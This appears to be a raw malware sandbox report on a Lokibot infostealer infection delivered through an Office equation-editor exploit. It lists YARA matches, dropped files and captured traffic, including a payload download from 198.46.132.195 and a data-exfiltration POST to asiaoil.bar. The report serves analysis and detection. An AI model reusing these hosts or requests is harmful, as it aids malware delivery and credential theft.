              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wCsqQDtUNyAdb8N7QE5gpRV6yQp9OM5kLzcDr7AlwMrEbZXvVwvalAee7gk3yYD6lCHsuYIHi9jPPTnfADT3Vv66t86Ej5Rk3p%2BU8OrA6dwgCuh8u7DexDMJSkMrXQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447381a755be1-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SRqidrs3tVmZaXWczrmKsgbZ4wzW0DNHNg57GTGmubIkUghb%2BRZ87SXRzbz4C2tAAPiS7VjMUqurezvKjUarwJZfb4vQq5PhgZ3zf0wd8HEEhwN0s6BL9vHZrcRCQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4473f0b3b9208-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wh%2FHtCJ%2F5r2bJkgiHao050klrqU1roeJfG%2B4i6f3I%2FKeYPkYarG1akcmrjP1MjieW7NO3IUngd6ffdEn3ApGf%2BloKJJBXuiDKbgTzbof4laU14sUbhPRo%2BZeW2t2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44745a96792b9-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4ZOuSqnAuokRLt6j%2BaPucUYURpspSs5959QwqxEaaI65vhxihU%2BSGTldehqd66BkHEec1wRdP8eKXsiuAfROg4bLz4JgpMIkfQ1aSuC9Jn%2BKCRCMyVVG8exy0%2Ffc7A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447528eb59094-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jDOcGscIXoe9amgDgblodsrhn0vmrU90jrXpu8eubmt%2FtVJmc0fEBfOASTLuxQbUt3Vyn6AzRV98aodD8X4wZ0aRqf1etGTdsv2KXeP8MDKpOfZ2KmYTIdqKCEQiTg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4475c4e69691b-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2nROjTYrKHq5Dp3zfqoq%2BF08OA0sabm52jF3F7aFN8zXdi%2BsX6Cq%2F1PGMTUNOdZpDBwGOKpy%2F6346z2Ex7OMyy0ds2Scyrm%2B5L4uaz1G2nfp7WA5GPCq2oiQAJpM6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44762ced16963-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=d88FAJAIS01MD7fqAfBFKZ2BhmJxCoOv1Hl6%2FrHHy0nAp1VZ0UmTp2mncxvNOP61QK0xudgAXXNSW%2FHEuL5DLwigS1D%2BHfHJsx5oxzhN7qOtYp8JjADI7dRG6jZTLw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447690f816969-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y4ckWSdyfKKgK%2FaSnEtfcnQkctDbfArW85YmMzuF2GYtn1Vk9z3zezqrAQm97NN4dlNgg4mlDR6cFowQrcAInwiWKaPPKhv22VNGu%2Fi7%2FjbZEoNLKbqtK0TOhixPTw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4476f3c7c9072-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mk%2F%2ByckUn75h6rICqGx9cpJuG7dAjWTNBLmPAr%2FZWuFMh6m%2Fl%2FaMElHYxT54c74Wcf%2BgX9vcoEDADUlGA5wqWcrwO%2B3jiZphR9HdBO0OgJ1mWc%2FTatA77PboqFA%2F%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447759aa39113-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lkoFlBzh%2FTvOS8G5hZ5h6dPK6YATM%2FnTao2RMMscPCKdFKdF3yBO98Mj55rUC%2BFjMzMKlTeqOz7aj%2Fqw04UBHUPGJ1ayR49HyEd8ogh8KcYhkHXG20zdKy28pHBuBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4477c0a09694f-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6IjZw4UIYZGNBtRkEhw0RzPzggwNQkdD8cEShbMPEDVfqNl1bXjX9XB1t94CL9pCK1%2FBnfmx78Swjpa1RBrVYoWA186HoyYm1jceSa4D8bUv8CTvYDnbykWZ8ANQ%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db447827e0d5b92-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: unknownTCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: vbc.exe, vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: xmtxpy.exe, xmtxpy.exe, 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, xmtxpy.exe, 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST //bobby/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: asiaoil.barAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 579BFA72Content-Length: 176Connection: close
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AB951BC.emfJump to behavior
              Source: unknownDNS traffic detected: queries for: asiaoil.bar
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00404ED4 recv,6_2_00404ED4
              Source: global trafficHTTP traffic detected: GET /windowSSH/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.132.195Connection: Keep-Alive
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00404F61

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Office equation editor drops PE file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeJump to dropped file
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
